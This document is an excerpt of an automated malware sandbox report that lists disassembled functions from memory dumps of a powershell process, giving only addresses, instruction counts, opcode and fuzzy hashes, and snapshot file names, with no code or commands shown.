                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e23d21d305f875266e25cba1bc477cfba597be62f461f3ee5cbae1899d79d4e
                                          • Instruction ID: 232f9c97ce28fddc72b860ef7ed59667d1a168bbca3d73a40fd092882c4282de
                                          • Opcode Fuzzy Hash: 7e23d21d305f875266e25cba1bc477cfba597be62f461f3ee5cbae1899d79d4e
                                          • Instruction Fuzzy Hash: 492151302105099BC740EBA4D9A09AD77A3DFC53143848DA8C5198F768DF61AD0F8FE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06266553 Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e8cbf030ca59f6050fb37dffb9c0836bb8242001b1fae7da01a67f8b361bd322
                                          • Instruction ID: dbd6638d093867cdeeb6f399a94377dd6be9712da3d3dd8d4514d72c84573ff8
                                          • Opcode Fuzzy Hash: e8cbf030ca59f6050fb37dffb9c0836bb8242001b1fae7da01a67f8b361bd322
                                          • Instruction Fuzzy Hash: 3D21A63121030B9BDB10DF66D890ABB77E6AF80718F048D25BC058B624EB74ED5A87D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626EBBD Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7faaf3c3e4fefc8526438bada8628f6679fc7dc10cb85f7cfb1bdfea34a3f211
                                          • Instruction ID: cbd1595e95a17717615d131459e70656c01436c2f40a66df6ef59854fa6224b7
                                          • Opcode Fuzzy Hash: 7faaf3c3e4fefc8526438bada8628f6679fc7dc10cb85f7cfb1bdfea34a3f211
                                          • Instruction Fuzzy Hash: CD316234A20209CFCB64DB65D8949ADB7F2FF84314B158868D9429B794DB70FC4ACB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062659C8 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5429390875864bf5391bdf461637b6be9fd2bc19fb66a77aa4427713bea4a6f2
                                          • Instruction ID: 534048dca40466c333557b56bfa6b0257c5dd224ee13e866201b2d6693e8b07c
                                          • Opcode Fuzzy Hash: 5429390875864bf5391bdf461637b6be9fd2bc19fb66a77aa4427713bea4a6f2
                                          • Instruction Fuzzy Hash: 1021C134A206099FD7149A69D494B6FB7A7EFC0328F10C52DD80A5B784DF746C8A8FD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626A498 Relevance: .1, Instructions: 73COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efd99c3ced6ca8c650eeab8855574bc1a60353b5ca2102e831c058b6f0d42eca
                                          • Instruction ID: 1d051ab8c76f47b6072b8a12bf8afc78a67814dda62acf4ab20718ee8c4cdd73
                                          • Opcode Fuzzy Hash: efd99c3ced6ca8c650eeab8855574bc1a60353b5ca2102e831c058b6f0d42eca
                                          • Instruction Fuzzy Hash: 6A2130302105099BCB40EBA8D8A49AD77A7DFC53183848DA8C51D8F768DF61AD1F8FE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06260AF0 Relevance: .1, Instructions: 73COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08c691248598dac3a766b6f4b2f444e72092c6839b027e5b43d84a1ba003fd9c
                                          • Instruction ID: 9222b273423cb3bf4357bee51aaf729458d611fa8a25f8da7cb2d6c7f126ea1d
                                          • Opcode Fuzzy Hash: 08c691248598dac3a766b6f4b2f444e72092c6839b027e5b43d84a1ba003fd9c
                                          • Instruction Fuzzy Hash: 79115139F216165BE7645626922137FA1968B8079DF04C12AEC0687384EBBDCA8593E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06264BB5 Relevance: .1, Instructions: 73COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f22f3bebedd78062a09c72ec526d240c7a75206e022e46a29c51eb29b3e0a542
                                          • Instruction ID: e7eb8d59847a244e4e298e5e700a55febb7938bd307843b9af6c5fa7b6c98125
                                          • Opcode Fuzzy Hash: f22f3bebedd78062a09c72ec526d240c7a75206e022e46a29c51eb29b3e0a542
                                          • Instruction Fuzzy Hash: 5D213A31A053541BD3019B68DC66BEF7F619F42704F588476E4459F7C2CB24884AC7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626D8D0 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 729b770b85114dfd1244c55f8d010a5f3c19f1fe215ceec9983da78dfc8f21bb
                                          • Instruction ID: a725437a9412bd2df8861e7dbecc08c986bcea85f47ffc5a43fa3b2f24568bac
                                          • Opcode Fuzzy Hash: 729b770b85114dfd1244c55f8d010a5f3c19f1fe215ceec9983da78dfc8f21bb
                                          • Instruction Fuzzy Hash: 04219235B102088FDB149B65D968ABEBBF6EF88315F10886AEA06E7390DF715D00CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06277570 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 458bb724cd6212b2fc3b4792394d3e2a52eac5ba54d30a85eca1f572c96d853e
                                          • Instruction ID: e12b925b3e8d085b1934e6dd14d4c595943c5d384ce5a1d06fcd42302972698c
                                          • Opcode Fuzzy Hash: 458bb724cd6212b2fc3b4792394d3e2a52eac5ba54d30a85eca1f572c96d853e
                                          • Instruction Fuzzy Hash: B0215C74A11216CFEB68CF19C858FA9B7F1FF44304F0085A9D909A72A4DB749A85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626A838 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14a84ea03ca8a9618807ee4e5e1e9f0442142fff59f33eae0f8343cfa38367c0
                                          • Instruction ID: 4a2da274bc2d0b74ed5d52195b5ad326d4d37974296ea65b24d4984dd933d1ec
                                          • Opcode Fuzzy Hash: 14a84ea03ca8a9618807ee4e5e1e9f0442142fff59f33eae0f8343cfa38367c0
                                          • Instruction Fuzzy Hash: 6B211D34B112048FDB04DB75C45AAAD7BB2AF8C305F148469E512B73A0CF759C4ADB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06263D08 Relevance: .1, Instructions: 67COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39b71cde0418f802ef474bbd53f2742e61ad2452d26b44ced26207c5c9a35b80
                                          • Instruction ID: b1ad7a1d340ef6bb1322ad22d025dc2a3089286c7b13b30742ad798827de9e18
                                          • Opcode Fuzzy Hash: 39b71cde0418f802ef474bbd53f2742e61ad2452d26b44ced26207c5c9a35b80
                                          • Instruction Fuzzy Hash: 8F11D331E206169FDB58DF7AC5412BEBBF6AF89254F10902AD805E7340E7348D41CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626D670 Relevance: .1, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6158c7a55fec335c7eb524789f3388d4904d5495ff27aedc30d7b2137a6c4c3b
                                          • Instruction ID: 2f58a5275b508278b179a444874bf023ec721324b46c22f3f7b9d78f18d6b01b
                                          • Opcode Fuzzy Hash: 6158c7a55fec335c7eb524789f3388d4904d5495ff27aedc30d7b2137a6c4c3b
                                          • Instruction Fuzzy Hash: E32129347002098FDB01EF64D8A56AEBBB3EFC4308F148429D815AB75ADF759C4A8B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062659B8 Relevance: .1, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7935db77bec08a630abfc2cce4fd17f92a65b11daecb69e40d7615c45235303
                                          • Instruction ID: dbe73da3b4f5857acd06d59f2ada6b8462e1bf4fd19313cd55625c48d6cccf8b
                                          • Opcode Fuzzy Hash: e7935db77bec08a630abfc2cce4fd17f92a65b11daecb69e40d7615c45235303
                                          • Instruction Fuzzy Hash: 0C11D331A206094FD7549A79C494BABB7A7EFC0324F14C52DD41A9B740DF746C8A8FE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626C9C1 Relevance: .1, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60696935f45ef835bcfc4f056714bfcde50d58cc9cfc8f3c444c91ea32574228
                                          • Instruction ID: f355afdafc88266a1e5d33533d7ac7af8b7581df690fe995ffa11c99c4770648
                                          • Opcode Fuzzy Hash: 60696935f45ef835bcfc4f056714bfcde50d58cc9cfc8f3c444c91ea32574228
                                          • Instruction Fuzzy Hash: 2A219F36F101058FCB54EF69C8586AE7BB6EF89214F54842AE906F3340DB705C81CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062651F8 Relevance: .1, Instructions: 64COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 609ea039ae7daf5dadc9bf1aa7cdb11777dfbaf92e130d0001e28319c0923d9a
                                          • Instruction ID: d7739d06f413da7ed2293177d3a3cab4527d97cff3451bf084d6c90d7a19b1da
                                          • Opcode Fuzzy Hash: 609ea039ae7daf5dadc9bf1aa7cdb11777dfbaf92e130d0001e28319c0923d9a
                                          • Instruction Fuzzy Hash: 02219034A502058FDB149B75C9597AE7BF2AF89305F20846AE906F77D0CF729C44CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626AA38 Relevance: .1, Instructions: 64COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: acbbaafd6425fe4263115d7863d3d36f898857c58e82bdb92966e7d1bc512753
                                          • Instruction ID: fc5d1b64ff2d25e67f2caca6795d624aba602329dae53adeff96d65bf59e775e
                                          • Opcode Fuzzy Hash: acbbaafd6425fe4263115d7863d3d36f898857c58e82bdb92966e7d1bc512753
                                          • Instruction Fuzzy Hash: B511D375B10302DFC764CF76CA40A66B7B6FF84304B14856AEC19A7241D731EC86CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062658F0 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6789fa10fac3d8cf7d5bf73446d8d7059614ee5ef79e6cbbeb9845390ca7a998
                                          • Instruction ID: 78c999a8053fe15440201390c6fc5f2f0453bc3d536277d3dfa4e6dd2ce04e27
                                          • Opcode Fuzzy Hash: 6789fa10fac3d8cf7d5bf73446d8d7059614ee5ef79e6cbbeb9845390ca7a998
                                          • Instruction Fuzzy Hash: B9211D70A006099FDB10DFA9D8809AEBBF2FF88314F104969E519A7750D771AD1ACBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06269558 Relevance: .1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c3718a46cef93eefcb04f9dacb0f0f93e5ed7e054c8e19e4c3cb92ec323cd15a
                                          • Instruction ID: 5e527a75c16842eb934c173c98f72d8b4f88c8ae5e02c707c7c354d7506975fe
                                          • Opcode Fuzzy Hash: c3718a46cef93eefcb04f9dacb0f0f93e5ed7e054c8e19e4c3cb92ec323cd15a
                                          • Instruction Fuzzy Hash: B9116031B1011A9FCB40EF69D8409AEBBF5FF88351B108536E904DB250EB31DD59CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06277901 Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3605de9a24b4dcafd81a7d6ca9b3b4148e9aeeb5e3b4038d4701a6344fcc690f
                                          • Instruction ID: 675e34c8a001061bc5b999a8e31620c9a3db73d33007d33645093f930441ed7a
                                          • Opcode Fuzzy Hash: 3605de9a24b4dcafd81a7d6ca9b3b4148e9aeeb5e3b4038d4701a6344fcc690f
                                          • Instruction Fuzzy Hash: 4521ED34A51116CFE764DB25D958F6D77F2AF88304F1085A5DA09E73A0DB70AD41CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06277567 Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 782aefdb04eed7cf53b5ee27f45b9612fbfeead7b29cd866d693429f46790ee6
                                          • Instruction ID: adf0a46d053878066229d5d3ed9391004d03e8567bf92b5bfcfc40d465ce1917
                                          • Opcode Fuzzy Hash: 782aefdb04eed7cf53b5ee27f45b9612fbfeead7b29cd866d693429f46790ee6
                                          • Instruction Fuzzy Hash: C5215074A11216CFEB58CF29C848FA9B7F1FF48304F0485A9D909AB2A5DB709E85CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06269549 Relevance: .1, Instructions: 58COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f8adbb79127de68767492a96e338ce42c7ff834e6910e8ff8039485352c3e05
                                          • Instruction ID: 69f0066738a171bd8300ee7fbb39212a2e8277cf934a7d71544ecce358a6a400
                                          • Opcode Fuzzy Hash: 1f8adbb79127de68767492a96e338ce42c7ff834e6910e8ff8039485352c3e05
                                          • Instruction Fuzzy Hash: A5119131B1021A9FDB40EA79D854AAEBBF5FF85305B144935E804D7350EB31ED46CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06265208 Relevance: .1, Instructions: 58COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a70b7c0da37055dd81d140a5d4dafaa1c39ddfb770a9bcf58c3ff99935844fb8
                                          • Instruction ID: bfd748103e073792d001dc9ca0a00d4150b309e5eb57bc20e6da6e5d2fccae78
                                          • Opcode Fuzzy Hash: a70b7c0da37055dd81d140a5d4dafaa1c39ddfb770a9bcf58c3ff99935844fb8
                                          • Instruction Fuzzy Hash: 2711AF30A102058FDB189B65C8197AE7BF2AF89304F2044AAE802BB390CF719C40CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062657E0 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3373cac72f7ce6039d4f3ca794dfc473ae55baaa7ae7531fa137c9fa569f58d5
                                          • Instruction ID: 8bd582c04bed0a8714d628a362d672b959f0999860f0c5970bd8c7abb4d53390
                                          • Opcode Fuzzy Hash: 3373cac72f7ce6039d4f3ca794dfc473ae55baaa7ae7531fa137c9fa569f58d5
                                          • Instruction Fuzzy Hash: F6113A71E102089FCB04EFA9D8855AEBBF6FF8C210B14842AE915F3351DB3059159FA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626AA48 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c7745b90606da1a5a859a5ae9ab728ba6495161adef3a3989d8cd436e2381ce
                                          • Instruction ID: 47f5896f306ee795a276d623725205a33fab0d3f329780625f17cf0b2b8af57b
                                          • Opcode Fuzzy Hash: 2c7745b90606da1a5a859a5ae9ab728ba6495161adef3a3989d8cd436e2381ce
                                          • Instruction Fuzzy Hash: 9F118F74B10306EFC764CF66D980A66B7BAFF88315B14852EE91997240D731E881CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062657F0 Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c3a69f088cbfa4ea6c438c028a2ad0ae0f0d71c729ab229900ac78cf2f9e848d
                                          • Instruction ID: d19c8cf74e4041c1759aa42d3bd9e1d3d79463a168b7e08ba95e2c5c1917a65d
                                          • Opcode Fuzzy Hash: c3a69f088cbfa4ea6c438c028a2ad0ae0f0d71c729ab229900ac78cf2f9e848d
                                          • Instruction Fuzzy Hash: F6112B71E102089F8B04EFA9D8849BEBBF6FF8C310B14846AE915B3350DB3159158FA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06265AD8 Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 590f9e5577e3586e27d53ce4cbeac0c60b672c404c93e70f77e3d6e4196555c7
                                          • Instruction ID: 9ed9489fe14493f76496f3735b51568be2b328b99456dc0753054eea8d81439b
                                          • Opcode Fuzzy Hash: 590f9e5577e3586e27d53ce4cbeac0c60b672c404c93e70f77e3d6e4196555c7
                                          • Instruction Fuzzy Hash: E21148756003059FC714CF68D884EAAFBF6FF88710B148A98E95A9B791D670FD05CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626C9D0 Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29bcde488eed33af349bc931a16c1666f70ec2bc7a2413dc1200082101e415fa
                                          • Instruction ID: 18919f92fdb1d415500e2371a5b75aad4d5accf84ffd63bfb7103b19c0238e07
                                          • Opcode Fuzzy Hash: 29bcde488eed33af349bc931a16c1666f70ec2bc7a2413dc1200082101e415fa
                                          • Instruction Fuzzy Hash: 77114C35F102048BCB18EFA9C4986AEBBF6AF89210F54942AE906F7340CB705C45CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626048A Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6132ec4b2814c14e26516e59acb0da9ba91353dba00640388a9cb572090f153f
                                          • Instruction ID: 772375f43a46798154b26faabc41b3e6784b4a7f731af7d5f22210fe1c5b7a8d
                                          • Opcode Fuzzy Hash: 6132ec4b2814c14e26516e59acb0da9ba91353dba00640388a9cb572090f153f
                                          • Instruction Fuzzy Hash: 3511A535A112099FDB10DF65D851AEF77B6EF84318F1044B8E9099B300EB31AE02CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062660D0 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e473aa32676f3b882f2d1e55292fd2ef92d51f7b1de19825beed10043230659
                                          • Instruction ID: 8f6068144c8b9777f24455f3f5cd7d0c46f7610efb518521495daa1a6e45d338
                                          • Opcode Fuzzy Hash: 9e473aa32676f3b882f2d1e55292fd2ef92d51f7b1de19825beed10043230659
                                          • Instruction Fuzzy Hash: 7401D2357182545FDB214A668814B6B7FA99BC6241F0480AAB905CB391C634C886C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06276F80 Relevance: .1, Instructions: 52COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f221194316e8a7eeb05a1b446390fabdce36e67c6295b83d2fc5f946f926e2ab
                                          • Instruction ID: 184f60bc5b7110b01aa42bdb304c862b50bba3464613998db63a58f8f2c6a8cf
                                          • Opcode Fuzzy Hash: f221194316e8a7eeb05a1b446390fabdce36e67c6295b83d2fc5f946f926e2ab
                                          • Instruction Fuzzy Hash: 2311E17AA002058FD705DFA8E8509AA77F6FF88300F19457ADA09D7355EB309C01CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626817F Relevance: .1, Instructions: 52COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7162f5a77c5b3ed6e2f33dc5341e8b52b7c37e1dfb6ab983749c32a8266215ad
                                          • Instruction ID: d6000cd353f61b4a594d66d53a1398a5f220cd94320a2f2c8b4fab42f973e9ba
                                          • Opcode Fuzzy Hash: 7162f5a77c5b3ed6e2f33dc5341e8b52b7c37e1dfb6ab983749c32a8266215ad
                                          • Instruction Fuzzy Hash: 6B119070D10249EFCB04CFA5E855AEEBFF6AF48300F188026F814B6250C7348954CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062688E0 Relevance: .1, Instructions: 52COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f35c078ceb55ec3e454f5845cbc56071b0ac2c2ca3fd225a20ad20b78f587ba6
                                          • Instruction ID: 22b7f9af011501b02a42697baddb8487fc90baa893962e6f8e328a105043b3ad
